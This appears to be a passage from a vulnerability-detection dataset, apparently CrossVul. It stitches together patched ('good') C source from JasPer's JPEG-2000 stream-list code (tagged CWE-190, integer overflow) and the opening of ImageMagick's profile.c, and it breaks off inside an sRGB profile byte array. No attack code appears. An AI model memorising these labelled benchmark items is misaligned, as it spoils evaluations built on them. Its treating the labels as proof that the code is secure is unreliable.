for (i = streamlist->numstreams; i < streamlist->maxstreams; ++i) {
streamlist->streams[i] = 0;
}
streamlist->maxstreams = newmaxstreams;
streamlist->streams = newstreams;
}
if (streamno != streamlist->numstreams) {
/* Can only handle insertion at start of list. */
return -1;
}
streamlist->streams[streamno] = stream;
++streamlist->numstreams;
return 0;
}
jas_stream_t *jpc_streamlist_remove(jpc_streamlist_t *streamlist, int streamno)
{
jas_stream_t *stream;
int i;
if (streamno >= streamlist->numstreams) {
abort();
}
stream = streamlist->streams[streamno];
for (i = streamno + 1; i < streamlist->numstreams; ++i) {
streamlist->streams[i - 1] = streamlist->streams[i];
}
--streamlist->numstreams;
return stream;
}
void jpc_streamlist_destroy(jpc_streamlist_t *streamlist)
{
int streamno;
if (streamlist->streams) {
for (streamno = 0; streamno < streamlist->numstreams;
++streamno) {
jas_stream_close(streamlist->streams[streamno]);
}
jas_free(streamlist->streams);
}
jas_free(streamlist);
}
jas_stream_t *jpc_streamlist_get(jpc_streamlist_t *streamlist, int streamno)
{
assert(streamno < streamlist->numstreams);
return streamlist->streams[streamno];
}
int jpc_streamlist_numstreams(jpc_streamlist_t *streamlist)
{
return streamlist->numstreams;
}
jpc_ppxstab_t *jpc_ppxstab_create()
{
jpc_ppxstab_t *tab;
if (!(tab = jas_malloc(sizeof(jpc_ppxstab_t)))) {
return 0;
}
tab->numents = 0;
tab->maxents = 0;
tab->ents = 0;
return tab;
}
void jpc_ppxstab_destroy(jpc_ppxstab_t *tab)
{
int i;
for (i = 0; i < tab->numents; ++i) {
jpc_ppxstabent_destroy(tab->ents[i]);
}
if (tab->ents) {
jas_free(tab->ents);
}
jas_free(tab);
}
int jpc_ppxstab_grow(jpc_ppxstab_t *tab, int maxents)
{
jpc_ppxstabent_t **newents;
if (tab->maxents < maxents) {
newents = (tab->ents) ? jas_realloc2(tab->ents, maxents,
sizeof(jpc_ppxstabent_t *)) : jas_alloc2(maxents, sizeof(jpc_ppxstabent_t *));
if (!newents) {
return -1;
}
tab->ents = newents;
tab->maxents = maxents;
}
return 0;
}
int jpc_ppxstab_insert(jpc_ppxstab_t *tab, jpc_ppxstabent_t *ent)
{
int inspt;
int i;
for (i = 0; i < tab->numents; ++i) {
if (tab->ents[i]->ind > ent->ind) {
break;
}
}
inspt = i;
if (tab->numents >= tab->maxents) {
if (jpc_ppxstab_grow(tab, tab->maxents + 128)) {
return -1;
}
}
for (i = tab->numents; i > inspt; --i) {
tab->ents[i] = tab->ents[i - 1];
}
tab->ents[i] = ent;
++tab->numents;
return 0;
}
jpc_streamlist_t *jpc_ppmstabtostreams(jpc_ppxstab_t *tab)
{
jpc_streamlist_t *streams;
uchar *dataptr;
uint_fast32_t datacnt;
uint_fast32_t tpcnt;
jpc_ppxstabent_t *ent;
int entno;
jas_stream_t *stream;
int n;
if (!(streams = jpc_streamlist_create())) {
goto error;
}
if (!tab->numents) {
return streams;
}
entno = 0;
ent = tab->ents[entno];
dataptr = ent->data;
datacnt = ent->len;
for (;;) {
/* Get the length of the packet header data for the current
tile-part. */
if (datacnt < 4) {
goto error;
}
if (!(stream = jas_stream_memopen(0, 0))) {
goto error;
}
if (jpc_streamlist_insert(streams, jpc_streamlist_numstreams(streams),
stream)) {
goto error;
}
tpcnt = (dataptr[0] << 24) | (dataptr[1] << 16) | (dataptr[2] << 8)
| dataptr[3];
datacnt -= 4;
dataptr += 4;
/* Get the packet header data for the current tile-part. */
while (tpcnt) {
if (!datacnt) {
if (++entno >= tab->numents) {
goto error;
}
ent = tab->ents[entno];
dataptr = ent->data;
datacnt = ent->len;
}
n = JAS_MIN(tpcnt, datacnt);
if (jas_stream_write(stream, dataptr, n) != n) {
goto error;
}
tpcnt -= n;
dataptr += n;
datacnt -= n;
}
jas_stream_rewind(stream);
if (!datacnt) {
if (++entno >= tab->numents) {
break;
}
ent = tab->ents[entno];
dataptr = ent->data;
datacnt = ent->len;
}
}
return streams;
error:
if (streams) {
jpc_streamlist_destroy(streams);
}
return 0;
}
int jpc_pptstabwrite(jas_stream_t *out, jpc_ppxstab_t *tab)
{
int i;
jpc_ppxstabent_t *ent;
for (i = 0; i < tab->numents; ++i) {
ent = tab->ents[i];
if (jas_stream_write(out, ent->data, ent->len) != JAS_CAST(int, ent->len)) {
return -1;
}
}
return 0;
}
jpc_ppxstabent_t *jpc_ppxstabent_create()
{
jpc_ppxstabent_t *ent;
if (!(ent = jas_malloc(sizeof(jpc_ppxstabent_t)))) {
return 0;
}
ent->data = 0;
ent->len = 0;
ent->ind = 0;
return ent;
}
void jpc_ppxstabent_destroy(jpc_ppxstabent_t *ent)
{
if (ent->data) {
jas_free(ent->data);
}
jas_free(ent);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5412_0 |
crossvul-cpp_data_good_5177_0 | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% PPPP RRRR OOO FFFFF IIIII L EEEEE %
% P P R R O O F I L E %
% PPPP RRRR O O FFF I L EEE %
% P R R O O F I L E %
% P R R OOO F IIIII LLLLL EEEEE %
% %
% %
% MagickCore Image Profile Methods %
% %
% Software Design %
% Cristy %
% July 1992 %
% %
% %
% Copyright 1999-2016 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% http://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/attribute.h"
#include "MagickCore/cache.h"
#include "MagickCore/color.h"
#include "MagickCore/colorspace-private.h"
#include "MagickCore/configure.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/image.h"
#include "MagickCore/linked-list.h"
#include "MagickCore/memory_.h"
#include "MagickCore/monitor.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/option.h"
#include "MagickCore/option-private.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/profile.h"
#include "MagickCore/profile-private.h"
#include "MagickCore/property.h"
#include "MagickCore/quantum.h"
#include "MagickCore/quantum-private.h"
#include "MagickCore/resource_.h"
#include "MagickCore/splay-tree.h"
#include "MagickCore/string_.h"
#include "MagickCore/thread-private.h"
#include "MagickCore/token.h"
#include "MagickCore/utility.h"
#if defined(MAGICKCORE_LCMS_DELEGATE)
#if defined(MAGICKCORE_HAVE_LCMS_LCMS2_H)
#include <wchar.h>
#include <lcms/lcms2.h>
#else
#include <wchar.h>
#include "lcms2.h"
#endif
#endif
/*
Forward declarations
*/
static MagickBooleanType
SetImageProfileInternal(Image *,const char *,const StringInfo *,
const MagickBooleanType,ExceptionInfo *);
static void
WriteTo8BimProfile(Image *,const char*,const StringInfo *);
/*
Typedef declarations
*/
struct _ProfileInfo
{
char
*name;
size_t
length;
unsigned char
*info;
size_t
signature;
};
typedef struct _CMSExceptionInfo
{
Image
*image;
ExceptionInfo
*exception;
} CMSExceptionInfo;
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% C l o n e I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% CloneImageProfiles() clones one or more image profiles.
%
% The format of the CloneImageProfiles method is:
%
% MagickBooleanType CloneImageProfiles(Image *image,
% const Image *clone_image)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o clone_image: the clone image.
%
*/
MagickExport MagickBooleanType CloneImageProfiles(Image *image,
const Image *clone_image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(clone_image != (const Image *) NULL);
assert(clone_image->signature == MagickCoreSignature);
if (clone_image->profiles != (void *) NULL)
{
if (image->profiles != (void *) NULL)
DestroyImageProfiles(image);
image->profiles=CloneSplayTree((SplayTreeInfo *) clone_image->profiles,
(void *(*)(void *)) ConstantString,(void *(*)(void *)) CloneStringInfo);
}
return(MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e l e t e I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DeleteImageProfile() deletes a profile from the image by its name.
%
% The format of the DeleteImageProfile method is:
%
% MagickBooleanTyupe DeleteImageProfile(Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport MagickBooleanType DeleteImageProfile(Image *image,const char *name)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return(MagickFalse);
WriteTo8BimProfile(image,name,(StringInfo *) NULL);
return(DeleteNodeFromSplayTree((SplayTreeInfo *) image->profiles,name));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e s t r o y I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DestroyImageProfiles() releases memory associated with an image profile map.
%
% The format of the DestroyProfiles method is:
%
% void DestroyImageProfiles(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport void DestroyImageProfiles(Image *image)
{
if (image->profiles != (SplayTreeInfo *) NULL)
image->profiles=DestroySplayTree((SplayTreeInfo *) image->profiles);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageProfile() gets a profile associated with an image by name.
%
% The format of the GetImageProfile method is:
%
% const StringInfo *GetImageProfile(const Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport const StringInfo *GetImageProfile(const Image *image,
const char *name)
{
const StringInfo
*profile;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((StringInfo *) NULL);
profile=(const StringInfo *) GetValueFromSplayTree((SplayTreeInfo *)
image->profiles,name);
return(profile);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t N e x t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetNextImageProfile() gets the next profile name for an image.
%
% The format of the GetNextImageProfile method is:
%
% char *GetNextImageProfile(const Image *image)
%
% A description of each parameter follows:
%
% o hash_info: the hash info.
%
*/
MagickExport char *GetNextImageProfile(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((char *) NULL);
return((char *) GetNextKeyInSplayTree((SplayTreeInfo *) image->profiles));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% P r o f i l e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ProfileImage() associates, applies, or removes an ICM, IPTC, or generic
% profile with / to / from an image. If the profile is NULL, it is removed
% from the image otherwise added or applied. Use a name of '*' and a profile
% of NULL to remove all profiles from the image.
%
% ICC and ICM profiles are handled as follows: If the image does not have
% an associated color profile, the one you provide is associated with the
% image and the image pixels are not transformed. Otherwise, the colorspace
% transform defined by the existing and new profile are applied to the image
% pixels and the new profile is associated with the image.
%
% The format of the ProfileImage method is:
%
% MagickBooleanType ProfileImage(Image *image,const char *name,
% const void *datum,const size_t length,const MagickBooleanType clone)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: Name of profile to add or remove: ICC, IPTC, or generic profile.
%
% o datum: the profile data.
%
% o length: the length of the profile.
%
% o clone: should be MagickFalse.
%
*/
#if defined(MAGICKCORE_LCMS_DELEGATE)
static unsigned short **DestroyPixelThreadSet(unsigned short **pixels)
{
register ssize_t
i;
assert(pixels != (unsigned short **) NULL);
for (i=0; i < (ssize_t) GetMagickResourceLimit(ThreadResource); i++)
if (pixels[i] != (unsigned short *) NULL)
pixels[i]=(unsigned short *) RelinquishMagickMemory(pixels[i]);
pixels=(unsigned short **) RelinquishMagickMemory(pixels);
return(pixels);
}
static unsigned short **AcquirePixelThreadSet(const size_t columns,
const size_t channels)
{
register ssize_t
i;
unsigned short
**pixels;
size_t
number_threads;
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
pixels=(unsigned short **) AcquireQuantumMemory(number_threads,
sizeof(*pixels));
if (pixels == (unsigned short **) NULL)
return((unsigned short **) NULL);
(void) ResetMagickMemory(pixels,0,number_threads*sizeof(*pixels));
for (i=0; i < (ssize_t) number_threads; i++)
{
pixels[i]=(unsigned short *) AcquireQuantumMemory(columns,channels*
sizeof(**pixels));
if (pixels[i] == (unsigned short *) NULL)
return(DestroyPixelThreadSet(pixels));
}
return(pixels);
}
static cmsHTRANSFORM *DestroyTransformThreadSet(cmsHTRANSFORM *transform)
{
register ssize_t
i;
assert(transform != (cmsHTRANSFORM *) NULL);
for (i=0; i < (ssize_t) GetMagickResourceLimit(ThreadResource); i++)
if (transform[i] != (cmsHTRANSFORM) NULL)
cmsDeleteTransform(transform[i]);
transform=(cmsHTRANSFORM *) RelinquishMagickMemory(transform);
return(transform);
}
static cmsHTRANSFORM *AcquireTransformThreadSet(Image *image,
const cmsHPROFILE source_profile,const cmsUInt32Number source_type,
const cmsHPROFILE target_profile,const cmsUInt32Number target_type,
const int intent,const cmsUInt32Number flags)
{
cmsHTRANSFORM
*transform;
register ssize_t
i;
size_t
number_threads;
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
transform=(cmsHTRANSFORM *) AcquireQuantumMemory(number_threads,
sizeof(*transform));
if (transform == (cmsHTRANSFORM *) NULL)
return((cmsHTRANSFORM *) NULL);
(void) ResetMagickMemory(transform,0,number_threads*sizeof(*transform));
for (i=0; i < (ssize_t) number_threads; i++)
{
transform[i]=cmsCreateTransformTHR((cmsContext) image,source_profile,
source_type,target_profile,target_type,intent,flags);
if (transform[i] == (cmsHTRANSFORM) NULL)
return(DestroyTransformThreadSet(transform));
}
return(transform);
}
#endif
#if defined(MAGICKCORE_LCMS_DELEGATE)
static void CMSExceptionHandler(cmsContext context,cmsUInt32Number severity,
const char *message)
{
CMSExceptionInfo
*cms_exception;
ExceptionInfo
*exception;
Image
*image;
cms_exception=(CMSExceptionInfo *) context;
image=cms_exception->image;
exception=cms_exception->exception;
if (image == (Image *) NULL)
{
(void) ThrowMagickException(exception,GetMagickModule(),ImageWarning,
"UnableToTransformColorspace","`%s'","unknown context");
return;
}
if (image->debug != MagickFalse)
(void) LogMagickEvent(TransformEvent,GetMagickModule(),"lcms: #%u, %s",
severity,message != (char *) NULL ? message : "no message");
(void) ThrowMagickException(exception,GetMagickModule(),ImageWarning,
"UnableToTransformColorspace","`%s'",image->filename);
}
#endif
static MagickBooleanType SetsRGBImageProfile(Image *image,
ExceptionInfo *exception)
{
static unsigned char
sRGBProfile[] =
{
0x00, 0x00, 0x0c, 0x8c, 0x61, 0x72, 0x67, 0x6c, 0x02, 0x20, 0x00, 0x00,
0x6d, 0x6e, 0x74, 0x72, 0x52, 0x47, 0x42, 0x20, 0x58, 0x59, 0x5a, 0x20,
0x07, 0xde, 0x00, 0x01, 0x00, 0x06, 0x00, 0x16, 0x00, 0x0f, 0x00, 0x3a,
0x61, 0x63, 0x73, 0x70, 0x4d, 0x53, 0x46, 0x54, 0x00, 0x00, 0x00, 0x00,
0x49, 0x45, 0x43, 0x20, 0x73, 0x52, 0x47, 0x42, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf6, 0xd6,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0xd3, 0x2d, 0x61, 0x72, 0x67, 0x6c,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x01, 0x50, 0x00, 0x00, 0x00, 0x99,
0x63, 0x70, 0x72, 0x74, 0x00, 0x00, 0x01, 0xec, 0x00, 0x00, 0x00, 0x67,
0x64, 0x6d, 0x6e, 0x64, 0x00, 0x00, 0x02, 0x54, 0x00, 0x00, 0x00, 0x70,
0x64, 0x6d, 0x64, 0x64, 0x00, 0x00, 0x02, 0xc4, 0x00, 0x00, 0x00, 0x88,
0x74, 0x65, 0x63, 0x68, 0x00, 0x00, 0x03, 0x4c, 0x00, 0x00, 0x00, 0x0c,
0x76, 0x75, 0x65, 0x64, 0x00, 0x00, 0x03, 0x58, 0x00, 0x00, 0x00, 0x67,
0x76, 0x69, 0x65, 0x77, 0x00, 0x00, 0x03, 0xc0, 0x00, 0x00, 0x00, 0x24,
0x6c, 0x75, 0x6d, 0x69, 0x00, 0x00, 0x03, 0xe4, 0x00, 0x00, 0x00, 0x14,
0x6d, 0x65, 0x61, 0x73, 0x00, 0x00, 0x03, 0xf8, 0x00, 0x00, 0x00, 0x24,
0x77, 0x74, 0x70, 0x74, 0x00, 0x00, 0x04, 0x1c, 0x00, 0x00, 0x00, 0x14,
0x62, 0x6b, 0x70, 0x74, 0x00, 0x00, 0x04, 0x30, 0x00, 0x00, 0x00, 0x14,
0x72, 0x58, 0x59, 0x5a, 0x00, 0x00, 0x04, 0x44, 0x00, 0x00, 0x00, 0x14,
0x67, 0x58, 0x59, 0x5a, 0x00, 0x00, 0x04, 0x58, 0x00, 0x00, 0x00, 0x14,
0x62, 0x58, 0x59, 0x5a, 0x00, 0x00, 0x04, 0x6c, 0x00, 0x00, 0x00, 0x14,
0x72, 0x54, 0x52, 0x43, 0x00, 0x00, 0x04, 0x80, 0x00, 0x00, 0x08, 0x0c,
0x67, 0x54, 0x52, 0x43, 0x00, 0x00, 0x04, 0x80, 0x00, 0x00, 0x08, 0x0c,
0x62, 0x54, 0x52, 0x43, 0x00, 0x00, 0x04, 0x80, 0x00, 0x00, 0x08, 0x0c,
0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3f,
0x73, 0x52, 0x47, 0x42, 0x20, 0x49, 0x45, 0x43, 0x36, 0x31, 0x39, 0x36,
0x36, 0x2d, 0x32, 0x2e, 0x31, 0x20, 0x28, 0x45, 0x71, 0x75, 0x69, 0x76,
0x61, 0x6c, 0x65, 0x6e, 0x74, 0x20, 0x74, 0x6f, 0x20, 0x77, 0x77, 0x77,
0x2e, 0x73, 0x72, 0x67, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x20, 0x31, 0x39,
0x39, 0x38, 0x20, 0x48, 0x50, 0x20, 0x70, 0x72, 0x6f, 0x66, 0x69, 0x6c,
0x65, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x3f, 0x73, 0x52, 0x47, 0x42, 0x20, 0x49, 0x45, 0x43, 0x36, 0x31,
0x39, 0x36, 0x36, 0x2d, 0x32, 0x2e, 0x31, 0x20, 0x28, 0x45, 0x71, 0x75,
0x69, 0x76, 0x61, 0x6c, 0x65, 0x6e, 0x74, 0x20, 0x74, 0x6f, 0x20, 0x77,
0x77, 0x77, 0x2e, 0x73, 0x72, 0x67, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x20,
0x31, 0x39, 0x39, 0x38, 0x20, 0x48, 0x50, 0x20, 0x70, 0x72, 0x6f, 0x66,
0x69, 0x6c, 0x65, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 0x00, 0x43, 0x72, 0x65, 0x61,
0x74, 0x65, 0x64, 0x20, 0x62, 0x79, 0x20, 0x47, 0x72, 0x61, 0x65, 0x6d,
0x65, 0x20, 0x57, 0x2e, 0x20, 0x47, 0x69, 0x6c, 0x6c, 0x2e, 0x20, 0x52,
0x65, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x64, 0x20, 0x69, 0x6e, 0x74, 0x6f,
0x20, 0x74, 0x68, 0x65, 0x20, 0x70, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x20,
0x64, 0x6f, 0x6d, 0x61, 0x69, 0x6e, 0x2e, 0x20, 0x4e, 0x6f, 0x20, 0x57,
0x61, 0x72, 0x72, 0x61, 0x6e, 0x74, 0x79, 0x2c, 0x20, 0x55, 0x73, 0x65,
0x20, 0x61, 0x74, 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x6f, 0x77, 0x6e,
0x20, 0x72, 0x69, 0x73, 0x6b, 0x2e, 0x00, 0x00, 0x64, 0x65, 0x73, 0x63,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x49, 0x45, 0x43, 0x20,
0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x77, 0x77, 0x77, 0x2e, 0x69,
0x65, 0x63, 0x2e, 0x63, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x16, 0x49, 0x45, 0x43, 0x20, 0x68, 0x74, 0x74,
0x70, 0x3a, 0x2f, 0x2f, 0x77, 0x77, 0x77, 0x2e, 0x69, 0x65, 0x63, 0x2e,
0x63, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2e,
0x49, 0x45, 0x43, 0x20, 0x36, 0x31, 0x39, 0x36, 0x36, 0x2d, 0x32, 0x2e,
0x31, 0x20, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x20, 0x52, 0x47,
0x42, 0x20, 0x63, 0x6f, 0x6c, 0x6f, 0x75, 0x72, 0x20, 0x73, 0x70, 0x61,
0x63, 0x65, 0x20, 0x2d, 0x20, 0x73, 0x52, 0x47, 0x42, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2e, 0x49, 0x45, 0x43,
0x20, 0x36, 0x31, 0x39, 0x36, 0x36, 0x2d, 0x32, 0x2e, 0x31, 0x20, 0x44,
0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x20, 0x52, 0x47, 0x42, 0x20, 0x63,
0x6f, 0x6c, 0x6f, 0x75, 0x72, 0x20, 0x73, 0x70, 0x61, 0x63, 0x65, 0x20,
0x2d, 0x20, 0x73, 0x52, 0x47, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x73, 0x69, 0x67, 0x20, 0x00, 0x00, 0x00, 0x00,
0x43, 0x52, 0x54, 0x20, 0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x0d, 0x49, 0x45, 0x43, 0x36, 0x31, 0x39, 0x36, 0x36,
0x2d, 0x32, 0x2e, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x0d, 0x49, 0x45, 0x43, 0x36, 0x31, 0x39, 0x36, 0x36,
0x2d, 0x32, 0x2e, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x76, 0x69, 0x65, 0x77, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0xa4, 0x7c,
0x00, 0x14, 0x5f, 0x30, 0x00, 0x10, 0xce, 0x02, 0x00, 0x03, 0xed, 0xb2,
0x00, 0x04, 0x13, 0x0a, 0x00, 0x03, 0x5c, 0x67, 0x00, 0x00, 0x00, 0x01,
0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x0a, 0x3d,
0x00, 0x50, 0x00, 0x00, 0x00, 0x57, 0x1e, 0xb8, 0x6d, 0x65, 0x61, 0x73,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x02, 0x8f, 0x00, 0x00, 0x00, 0x02, 0x58, 0x59, 0x5a, 0x20,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf3, 0x51, 0x00, 0x01, 0x00, 0x00,
0x00, 0x01, 0x16, 0xcc, 0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6f, 0xa0,
0x00, 0x00, 0x38, 0xf5, 0x00, 0x00, 0x03, 0x90, 0x58, 0x59, 0x5a, 0x20,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x97, 0x00, 0x00, 0xb7, 0x87,
0x00, 0x00, 0x18, 0xd9, 0x58, 0x59, 0x5a, 0x20, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x24, 0x9f, 0x00, 0x00, 0x0f, 0x84, 0x00, 0x00, 0xb6, 0xc4,
0x63, 0x75, 0x72, 0x76, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
0x00, 0x00, 0x00, 0x05, 0x00, 0x0a, 0x00, 0x0f, 0x00, 0x14, 0x00, 0x19,
0x00, 0x1e, 0x00, 0x23, 0x00, 0x28, 0x00, 0x2d, 0x00, 0x32, 0x00, 0x37,
0x00, 0x3b, 0x00, 0x40, 0x00, 0x45, 0x00, 0x4a, 0x00, 0x4f, 0x00, 0x54,
0x00, 0x59, 0x00, 0x5e, 0x00, 0x63, 0x00, 0x68, 0x00, 0x6d, 0x00, 0x72,
0x00, 0x77, 0x00, 0x7c, 0x00, 0x81, 0x00, 0x86, 0x00, 0x8b, 0x00, 0x90,
0x00, 0x95, 0x00, 0x9a, 0x00, 0x9f, 0x00, 0xa4, 0x00, 0xa9, 0x00, 0xae,
0x00, 0xb2, 0x00, 0xb7, 0x00, 0xbc, 0x00, 0xc1, 0x00, 0xc6, 0x00, 0xcb,
